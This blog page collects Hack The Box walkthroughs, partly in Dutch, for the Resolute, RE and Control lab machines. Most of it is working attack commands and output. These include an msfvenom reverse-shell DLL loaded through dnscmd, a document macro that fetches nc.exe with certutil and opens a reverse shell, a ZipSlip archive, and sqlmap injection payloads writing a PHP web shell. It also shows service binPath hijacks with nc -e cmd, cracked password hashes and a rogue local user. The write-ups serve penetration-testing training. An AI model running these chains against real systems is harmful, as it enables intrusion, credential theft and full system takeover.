PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="InputObject"; value="The syntax of this command is:"
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (The syntax of this command is::String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (The syntax of this command is::String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
*Evil-WinRM* PS C:\PSTranscripts\20191203>

I found a lot of useful information including user Ryan (probably a System Administrator), link to backups, system files location etc.

next use EvilWinRM again to login as Ryan.

kali@kali:/opt/evil-winrm$ ruby evil-winrm.rb -i 10.10.10.169 -u ryan -p Serv3r4Admin4cc123!

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\ryan\Documents> dir -force


Directory: C:\Users\ryan\Documents


Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hsl 9/27/2019 7:05 AM My Music
d--hsl 9/27/2019 7:05 AM My Pictures
d--hsl 9/27/2019 7:05 AM My Videos


*Evil-WinRM* PS C:\Users\ryan\Documents>
The user ryan is found to be a member of DnsAdmins . Being a member of the DnsAdmins group allows us to use the dnscmd.exe to specify a plugin DLL that should be loaded by the DNSservice.

kali@kali:~/htb/resolute$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.13 LPORT=4444 --platform=windows -f dll > plugin.dll
[-] No arch selected, selecting arch: x64 from the payload No encoder or badchars specified, outputting raw payload Payload size: 460 bytes Final size of dll file: 5120 bytes

or we use:
msfvenom -p windows/x64/exec cmd='net user administrator P@s5w0rd123! /domain' -f dll > da.dll Transferring this to the box would likely trigger Windows Defender, so we can use Impacket's smbserver.py to start an SMB server and host the dll remotely. 

kali@kali:~/htb/resolute$ sudo python3 smbserver.py share ./ Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation [*] Config file parsed [*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0 [*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0 [*] Config file parsed [*] Config file parsed [*] Config file parsed [*] Incoming connection (10.10.10.169,50628) [*] AUTHENTICATE_MESSAGE (MEGABANK\RESOLUTE$,RESOLUTE) [*] User RESOLUTE\RESOLUTE$ authenticated successfully [*] RESOLUTE$::MEGABANK:4141414141414141:283a502fc11be6ad1ec4fa0aa4cabfba:010100000000000080db3d319d56d601c17a65539582e7de0000000001001000750078006f0050004f0058005300650003001000750078006f0050004f00580053006500020010006200620042005700410073006300430004001000620062004200570041007300630043000700080080db3d319d56d601060004000200000008003000300000000000000000000000004000001d931475038242cfeeee05844da428985f415e4fa4005bcd9cf845e6c9bda5510a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00310033000000000000000000 [*] Disconnecting Share(1:IPC$) [*] Disconnecting Share(2:SHARE) [*] Handle: 'ConnectionResetError' object is not subscriptable [*] Closing down connection (10.10.10.169,50628) [*] Remaining connections [] 


*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd resolute /config /serverlevelplugindll \\10.10.14.13\share\plugin.dll
*Evil-WinRM* PS C:\Users\ryan\Documents> sc stop dns
*Evil-WinRM* PS C:\Users\ryan\Documents> sc start dns


kali@kali:~/htb/resolute$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.169] 50629
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>hostname
hostname
Resolute

C:\Windows\system32>whoami
whoami
nt authority\system

Author: Puckiestyle

 

htb-re-nl

Zoals altijd eerst een nmap scan

root@kali:~/htb/re# nmap -p- -sT -oN nmapscan 10.10.10.144
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-20 03:27 EST
Stats: 0:00:25 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 14.92% done; ETC: 03:30 (0:02:23 remaining)
Nmap scan report for 10.10.10.144
Host is up (0.029s latency).
Not shown: 65533 filtered ports
PORT    STATE SERVICE
80/tcp  open  http
445/tcp open  microsoft-ds

Ik vond de shares met behulp van

root@kali:~/htb/re# smbmap -H 10.10.10.144 -u guest -p ''
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.144...
[+] IP: 10.10.10.144:445 Name: reblog.htb 
Disk Permissions
---- -----------
IPC$ READ ONLY
malware_dropbox READ ONLY

vervolgens las ik de reblog.htb, en heb daarna een malicious odt file geupload, larer bleek dat het een ods file moest zijn.

In metasploit is er een exploit die zou moeten werken :

exploit/multi/misc/openoffice_document_macro

We hernoemen het verkregen bestand naar zip, en bewerken deze door de payload te vervangen door   :

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE script:module PUBLIC "-//OpenOffice.org//DTD OfficeDocument 1.0//EN" "module.dtd"> <script:module xmlns:script="http://openoffice.org/2000/script" script:name="Module1" script:language="StarBasic"> Sub OnLoad Shell(&quot;certutil.exe -urlcache -split -f 'http://10.10.14.7/nc.exe' C:\Windows\System32\spool\drivers\color\nc.exe&quot;) Shell(&quot;C:\Windows\System32\spool\drivers\color\nc.exe 10.10.14.7 1111 -e cmd.exe&quot;) End Sub </script:module>
Daarna sla ik het aangepaste bestand op als ods file ipv zip
root@kali:~/htb/re# smbclient //reblog.htb/"malware_dropbox" -u blah
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Jan 22 02:19:02 2020
.. D 0 Wed Jan 22 02:19:02 2020

8247551 blocks of size 4096. 4294559 blocks available
smb: \> put puckiestyle.odt
putting file puckiestyle.odt as \puckiestyle.odt (28.8 kb/s) (average 28.8 kb/s)
smb: \>
root@kali:~/htb# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.144 - - [22/Jan/2020 04:03:03] "GET /nc.exe HTTP/1.1" 200 -
10.10.10.144 - - [22/Jan/2020 04:03:04] "GET /nc.exe HTTP/1.1" 200 -
10.10.10.144 - - [22/Jan/2020 04:03:53] "GET /nc.exe HTTP/1.1" 200 -
10.10.10.144 - - [22/Jan/2020 04:03:53] "GET /nc.exe HTTP/1.1" 200 -


root@kali:~/htb/re# smbclient //reblog.htb/"malware_dropbox" -u blah
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jan 22 04:59:00 2020
  ..                                  D        0  Wed Jan 22 04:59:00 2020

		8247551 blocks of size 4096. 4294527 blocks available
smb: \> put facelesscoder.ods
putting file facelesscoder.ods as \facelesscoder.ods (28.0 kb/s) (average 28.0 kb/s)
smb: \> put facelesscoder.ods
putting file facelesscoder.ods as \facelesscoder.ods (28.1 kb/s) (average 28.1 kb/s)
smb: \> 

hier is mijn gebruikte odt/ods bestand https://github.com/puckiestyle/pentest/blob/master/puckiestyle.ods.zip

 root@kali:~# rlwrap nc -nlvp 1111
listening on [any] 1111 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.144] 49675
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Program Files\LibreOffice\program>whoami
whoami
re\luke

C:\Program Files\LibreOffice\program>
c:\Users\luke\Desktop>type user.txt
type user.txt
FE41736F5B9311E48E48B520D9F384D3

.

ZipSlip archie maken

Ik maakt een zipslip, door eerst in mijn kali box folders aan te maken \inetpub\wwwroot\blog

vervolgens copieerde ik hier puckieshell.ods hierheen

toen maakt ik het zipslip met

root@kali:/HTB/RE# zip temp.zip ../../../../../../../../inetpub/wwwroot/blog/puckieshell.aspx
 adding ../../../../../../../../inetpub/wwwroot/blog/puckieshell.aspx (      deflated 75%)

upload vervolgens dit zipslip.zip naar ods folder for analyse door vulerable WinRAR

c:\Users\luke\Documents>dir
dir
Volume in drive C has no label.
Volume Serial Number is 4638-2C29

Directory of c:\Users\luke\Documents

06/18/2019 01:05 PM <DIR> .
06/18/2019 01:05 PM <DIR> ..
01/22/2020 03:28 AM <DIR> malware_dropbox
01/22/2020 03:28 AM <DIR> malware_process
01/22/2020 03:46 AM <DIR> ods
06/18/2019 09:30 PM 1,096 ods.yara
06/18/2019 09:33 PM 1,783 process_samples.ps1
03/13/2019 05:47 PM 1,485,312 yara64.exe
3 File(s) 1,488,191 bytes
5 Dir(s) 17,559,576,576 bytes free

c:\Users\luke\Documents>whoami
whoami
re\luke

c:\Users\luke\Documents>certutil -urlcache -split -f "http://10.10.14.7/puckiestyle.zip" "c:\Users\luke\Documents\ods\runme.rar"
certutil -urlcache -split -f "http://10.10.14.7/puckiestyle.zip" "c:\Users\luke\Documents\ods\runme.rar"
****  Online  ****
  0000  ...
  322f
CertUtil: -URLCache command completed successfully.

root@kali:~/htb# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.144 - - [22/Jan/2020 08:16:30] "GET /nc.exe HTTP/1.1" 200 -
10.10.10.144 - - [23/Jan/2020 04:00:25] "GET /puckiestyle.zip HTTP/1.1" 200 -

`vervolgens opende ik de browser  en ging naar de shell

Ik maakte eerst een folder c:\temp om daar mijn bestanden neer te zetten. En vervolgens starte ik een netcat sessie

root@kali:~/htb/re# rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.144] 49734
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\inetpub\wwwroot\blog>whoami
whoami
iis apppool\reblog
c:\Program Files\Sysinternals>accesschk -accepteula -uvwc * > c:\temp\accesscheck.txt
accesschk -accepteula -uvwc * > c:\temp\accesscheck.txt

Accesschk v6.12 - Reports effective permissions for securable objects
Copyright (C) 2006-2017 Mark Russinovich
Sysinternals - www.sysinternals.com

vervolgens ontdekte ik in accesscheck.txt dat NT AUTHORITY\SERVICE ook RW access had op UsoSvc

c:\Program Files\Sysinternals>type c:\temp\accesscheck.txt
-knip-
UserManager
Medium Mandatory Level (Default) [No-Write-Up]
RW NT AUTHORITY\SYSTEM
SERVICE_ALL_ACCESS
RW BUILTIN\Administrators
SERVICE_ALL_ACCESS
UsoSvc
Medium Mandatory Level (Default) [No-Write-Up]
RW NT AUTHORITY\SYSTEM
SERVICE_ALL_ACCESS
RW NT AUTHORITY\SERVICE
SERVICE_ALL_ACCESS
VaultSvc

Voor PrivEsc heb ik de usosvc gebruikt. ( eerst current bin path controleren, en daarna aanpassen, en als laatste de usosvc service stoppen en starten )

C:\inetpub\wwwroot\blog>sc config usosvc binPath="C:\temp\nc.exe 10.10.14.7 53 -e cmd"
sc config usosvc binPath="C:\temp\nc.exe 10.10.14.7 53 -e cmd"
[SC] ChangeServiceConfig SUCCESS

C:\inetpub\wwwroot\blog>reg query "HKLM\System\CurrentControlSet\Services\usosvc" /v "ImagePath"
reg query "HKLM\System\CurrentControlSet\Services\usosvc" /v "ImagePath"

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\usosvc
ImagePath REG_EXPAND_SZ C:\temp\nc.exe 10.10.14.7 53 -e cmd


C:\inetpub\wwwroot\blog>net stop usosvc
net stop usosvc
The Update Orchestrator Service service is not started.

More help is available by typing NET HELPMSG 3521.


C:\inetpub\wwwroot\blog>net start usosvc
net start usosvc
The service is not responding to the control function.

More help is available by typing NET HELPMSG 2186.


C:\inetpub\wwwroot\blog>


root@kali:~/htb/re# rlwrap nc -nlvp 53
listening on [any] 53 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.144] 49735
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>net user coby IEstyle
net user coby IEstyle
The command completed successfully.

C:\Windows\system32>net share root=C:\Users\administrator\desktop /grant:everyone,FULL
C:\Windows\system32>net use z: \\127.0.0.1\root /user:coby IEstyle
net use z: \\127.0.0.1\root /user:coby IEstyle
The command completed successfully.

C:\Windows\system32>z:
z:

Z:\>dir
dir
Volume in drive Z has no label.
Volume Serial Number is 4638-2C29

Directory of Z:\

04/14/2019 11:35 AM <DIR> .
04/14/2019 11:35 AM <DIR> ..
03/27/2019 05:37 AM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 17,572,204,544 bytes free

Z:\>type root.txt
type root.txt
1B4FB905423F4AD8D99C731468F7715D

Z:\>

het kan ook ipv met netcat met PowerUp
Invoke-ServiceAbuse -Name "UsoSvc" -Command "\users\public\downloads\nc.exe 10.10.14.7 53 -e cmd"

Auteur : Puckiestyle

Protected: HTB-PLAYER-NL

This content is password protected. To view it please enter your password below:

Posted on

Protected: HTB-SCAVENGER-NL

This content is password protected. To view it please enter your password below:

Posted on

htb-control-nl

As always we start with a nmap scan

# Nmap 7.80 scan initiated Fri Jan 3 10:25:07 2020 as: nmap -sC -sV -oA control-nmap 10.10.10.167
Nmap scan report for 10.10.10.167
Host is up (0.033s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods: 
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Fidelity
135/tcp open msrpc Microsoft Windows RPC
3306/tcp open mysql?
| fingerprint-strings: 
| DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, HTTPOptions, Help, Kerberos, LDAPSearchReq, LPDString, RPCCheck, RTSPRequest, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServerCookie, X11Probe: 
|_ Host '10.10.16.70' is not allowed to connect to this MariaDB server
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.80%I=7%D=1/3%Time=5E0F5CE5%P=x86_64-pc-linux-gnu%r(HTT
SF:POptions,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.16\.70'\x20is\x20not\x2
SF:ookie,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.16\.70'\x20is\x20not\x2\x04Host\x20'10\.10\.16\.70'\x20is\x20not\x20allowed\x20to\x20conne
SF:ct\x20to\x20this\x20MariaDB\x20server");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jan 3 10:25:32 2020 -- 1 IP address (1 host up) scanned in 25.52 seconds

There is a website hosted in the default tcp port called “Fidelity”

There are 4 pages, index page, an about page, Admin page and login page. The admin and login pages did not provide any login form, but with an error “Access Denied: Header Missing. Please ensure you go through the proxy to access this page“. This error pointing towards a misconfiguration. So I proceed to analyze the source-code.

The source-code of index.php has commented section with a message -To-do:

This revealed an internal IP address: 192.168.4.28d. I fire-up the burp to see if there is any requests being sent ot receives.

The Burp request also showed the request isn’t going to the webserver, but the same error comes if I request to access admin.php or login.php pages.

So, to access these either you need to have a proxy which allows you the access or simulate that you are using the proxy by adding HTTP header “X-Forwarded-For”. The Burp is useful to add such headers, so I’m going to use my already running Burp. I’m assuming that the IP 192.168.4.28 for x-forwarded-for IP (proxy) because this is the only internal IP I’ve found in the websites source-code and it actually worked.

As soon as I forward the request in Burp, I was able to access the admin panel (or a product page).

SQLi

So the next step was to find the SQLi in the products table. I used burp to extract search requests from the database to use exploit it using SQLMAP.

The Info:

I saved the info as control.txt. and run the SQLMAP using this command: sqlmap –all -r control.txt –batch

The SQLMAP successfully cracked the database and got me what I was looking for – usernames and passwords (in hash)

I can’t do anything with the passwords I have, I can’t log in to the system unless I upload the shell to get RCE from SQLi. So what I decided is to use Burp again to send my PHP payload to create a reverse shell inside the database system. I found several RCEs, but used this one. I modified a bit and my final payload would look like this:

Easier is to use

root@kali:~/htb/control# cat s2.php
<?php echo shell_exec($_GET["cmd"]); ?>
root@kali:~/htb/control# sqlmap -r req --dbms mysql --file-write=s2.php --file-dest="C:/Inetpub/wwwroot/s2.php"
___
__H__
___ ___[.]_____ ___ ___ {1.3.8#stable}
|_ -| . [)] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 03:03:32 /2020-02-27/

[03:03:32] [INFO] parsing HTTP request from 'req'
[03:03:32] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: productName (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: productName=-4687' OR 8277=8277#

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: productName=blah' AND (SELECT 1098 FROM(SELECT COUNT(*),CONCAT(0x716b6b7671,(SELECT (ELT(1098=1098,1))),0x717a717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- SQcG

Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (comment)
Payload: productName=blah';SELECT SLEEP(5)#

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: productName=blah' AND (SELECT 7645 FROM (SELECT(SLEEP(5)))VIiw)-- ZBOf

Type: UNION query
Title: MySQL UNION query (NULL) - 6 columns
Payload: productName=blah' UNION ALL SELECT NULL,CONCAT(0x716b6b7671,0x7474516e41764359637658616b4e77796557634a77594f6d7a4247674e4c5476696b6e4644446964,0x717a717171),NULL,NULL,NULL,NULL#
---
[03:03:32] [INFO] testing MySQL
[03:03:33] [INFO] confirming MySQL
[03:03:33] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 10 or 2016
web application technology: Microsoft IIS 10.0, PHP 7.3.7
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[03:03:33] [INFO] fingerprinting the back-end DBMS operating system
[03:03:33] [INFO] the back-end DBMS operating system is Windows
[03:03:34] [WARNING] potential permission problems detected ('Access denied')
[03:03:34] [WARNING] time-based comparison requires larger statistical model, please wait........................ (done)
do you want confirmation that the local file 's2.php' has been successfully written on the back-end DBMS file system ('C:/Inetpub/wwwroot/s2.php')? [Y/n] y
[03:03:46] [INFO] the local file 's2.php' and the remote file 'C:/Inetpub/wwwroot/s2.php' have the same size (41 B)
[03:03:46] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.10.10.167'
[03:03:46] [WARNING] you haven't updated sqlmap for more than 208 days!!!

[*] ending @ 03:03:46 /2020-02-27/

root@kali:~/htb/control#

POWERCAT REVERSE SHELL

Now, I need a reverse connection from the Control machine. Since the machine is windows, I would go for PowerShell reverse shells. After reading and a lot of research, I decided to use PowerCAT.

Setup:

  • I download the PowerCAT.ps1 to the working directory
  • Setup the Python HTTP server: python -m SimpleHTTPServer 8081
  • A netcat listener: nc –lvnp 8080
  • And finally “calling it from the website” to make it work (very simple words).

The Activator:

ref: https://www.sherlocklee.top/2019/09/28/Reverse-Shell/

As soon as I run the above caller my netcat listener got me the reverse shell:
root@kali:~/htb# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.167 - - [27/Feb/2020 03:17:19] "GET /powercat.ps1 HTTP/1.1" 200 -
root@kali:~/htb/control# rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.167] 50670
Microsoft Windows [Version 10.0.17763.805]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\inetpub\wwwroot>whoami
whoami
nt authority\iusr

I have access to the system, however, I’m not able to list the user directories. There are two users, an Administrator and Hector – I have access denied to both user directories.

BUILDING THE TUNNEL: (THIS IS A FAILED STEP, PLEASE PROCEED TO ” WHITE WINTER WOLF WEBSHELL” SECTION)

I fired-up netstat -ano to see the processes running and listening.

I found that the WinRM service is active and running (TCP [::]:5985 [::]:0 LISTENING 4). This service running locally I’m not able to access externally, so the next step is to create a tunnel between my Kali and the Control machine. I will use the windows binary in kali PuTTY PLINK to create the tunnel.

Uploading PLink.exe

Now this seems to be a hard task for me. I tried following but I have an error:

Setup Python SMBServer

Copy PLink.exe using Command Prompt:

WHITEWINTERWOLF WEBSHELL

So, my plan to copy PuTTY PLINK using good boy way was failed so badly that I went to sleep shutting down my laptop. In the sleep, I was told by the angels that I could use WhiteWinterWolf’s Webshell to upload my PuTTY PLINK Here is what I did:

  • I copied Webshell PHP script on to a file called “nshell.php”
  • I used the same old resources text I used to run SQLMAP in my earlier step
  • I created a new SQLMAP query to copy the script into C:\inetpub\wwwroot\uploads\

My new SQLMAP script:

After running the SQLMAP, my new shell was successfully uploaded.

WhiteWinterWolf’s PHP web shell Upload

As soon as I have the confirmation from SQLMAP that my shell was uploaded successfully, I opened my browser and browsed the shell:

I upload the nc.exe and PuTTY PLINK to be sure to make at least 1 connection run properly.

Uploading PLink.exe using WhiteWinterWolf’s PHP web shell

I’m going to run the PLink.exe first because I wanted to test if this can help me. I know nc.exe will work for sure, but I haven’t tried Plink for tunneling. Let us try.

The tunnel was successfully created

PuTTY PLINK Tunnel Between Windows and Kali Machines

Now I can run EvilWiNRM localy on the Control machine. However, I’m still low privileged user, so I need to run EvilWinRM as user Hector. if you remember in my initial SQLMAP scan it revealed 3 users’ password hashes.

hector : password hash: *0E178792E8FC304A2E3133D535D38CAF1DA3CD9D
manager : password hash: *CFE3EEE434B38CBF709AD67A4DCDEA476CBA7FDA clear-text password: l3tm3!n
root : password hash: *0A4A5CAD344718DC418035A1F4D292BA603134D8

SQLMAP managed to get the user Manager’s password in clear text, however, our Hector’s password is still unknown, I used John to crack the password. l33th4x0rhector

0e178792e8fc304a2e3133d535d38caf1da3cd9d:l33th4x0rhector

Time to run EvilWinRM as Hector: ( and getting user.txt )

root@kali:/opt/evil-winrm# ./evil-winrm.rb -i 127.0.0.1 -u hector -p 'l33th4x0rhector'

Info: Starting Evil-WinRM shell v1.6

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Hector\Documents> dir
*Evil-WinRM* PS C:\Users\Hector\Documents> cd ..
*Evil-WinRM* PS C:\Users\Hector> cd Desktop
*Evil-WinRM* PS C:\Users\Hector\Desktop> type user.txt
d8782dd01fb15b72c4b5ba77ef2d472b
*Evil-WinRM* PS C:\Users\Hector\Desktop>

GETTING ROOT

In order to get Root, we need to escalate the privilege of our current user, Hector. This article and this article gives a great way of windows privesc. I had to read several such articles to find the right way to become Administrator of Control machine.

Let us see what is our user Hector is capable to do?

Is there any Administrator groups?

So the cmdkey /list also didn’t give me any hint of stored credentials in the box. Its getting a bit hard for me at this stage.

The Windows ACL (Access Control List) is the most important command to run post-exploit. This gives a hint about how the current compromised user can help in privesc. I’m concentrating on the System’s CurrentControlSet to see what type of rights our user Hector has. The command is: get-acl HKLM:\System\CurrentControlSet\services* | Format-List * | findstr /i "Hector Users Path

The command returned with huge list of ACL of user Hector:

ABUSING SERVICES

I have a list of services Hector can run with full control. The service “wuauserv” is what I should use as per the hint I received in HTB Forum.

Windows WUAUServ is a system service of the Windows Update feature. It runs only when Windows Update is running. This service runs for a couple of minutes and verifies if there is a Windows Update is going on or no if the service is not running it stops itself.

If you remember the retired machine Helpline, I exploit the windows print spool service to run my nc.exe. I’m going to use the same practice to exploit this machine.

*Evil-WinRM* PS C:\inetpub\wwwroot\uploads> copy nc.exe C:\windows\system32\spool\drivers\color\nc.exe

START LISTENING:

root@kali:~/htb# rlwrap nc -nlvp 4444
listening on [any] 4444 ...

START SERVICE

*Evil-WinRM* PS C:\Users\Hector\Documents> get-service wuauserv

Status Name DisplayName 
------ ---- ----------- 
Stopped wuauserv Windows Update

*Evil-WinRM* PS C:\Users\Hector\Documents> start-service wuauserv

REVERSE SHELL AS ADMINISTRATOR

root@kali:~/htb# rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.167] 50826
Microsoft Windows [Version 10.0.17763.805]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>cd /
C:\>cd Users/Administrator/Desktop
C:\Users/Administrator/Desktop>type root.txt
d8782dd01fb15b72c4b5ba77ef2d472b
*Evil-WinRM* PS C:\Users\Hector\Documents> sc.exe query wuauserv

SERVICE_NAME: wuauserv 
TYPE : 20 WIN32_SHARE_PROCESS 
STATE : 4 RUNNING 
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
*Evil-WinRM* PS C:\Users\Hector\Documents> get-process

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
*Evil-WinRM* PS C:\Users\Hector\Documents>  taskkill.exe /f /pid 728
SUCCESS: The process with PID 728 has been terminated.

user=>d8782dd01fb15b72c4b5ba77ef2d472b              root=>8f8613f5b4da391f36ef11def4cec1b1

Author : Puckiestyle

 

Protected: HTB-MANGO-NL

This content is password protected. To view it please enter your password below:

Posted on